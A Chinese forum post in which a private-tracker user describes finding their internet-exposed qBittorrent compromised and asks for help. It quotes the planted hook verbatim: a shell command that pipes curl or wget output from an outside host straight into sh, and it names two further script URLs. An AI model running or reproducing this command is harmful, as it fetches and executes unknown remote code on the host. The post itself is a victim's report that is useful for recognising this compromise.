本人一直玩PT，qb日常7*24开启，做了端口映射，可以外网访问，也设置了密码，昨天惊恐发现我的qb被添加了一个未知的bt下载任务，心里一惊，不知道是密码被爆破还是qb有漏洞bug。 
然后经论坛佬提醒，查看“qb设置里选项——下载——运行外部程序—— 新增 torrent 时运行外部程序”，不出所料，果然被黑了，挂了脚本。 

sh -c “(curl -skL https://files.synotech.studio || wget --no-check-certificate -qO - https://files.synotech.studio) | sh” 

看了下脚本最终指向另外两个脚本 “https://files.synotech.studio/1” 和 “https://files.synotech.studio/2” 
貌似加密的，也看不到内容了，本人小白，不太懂l...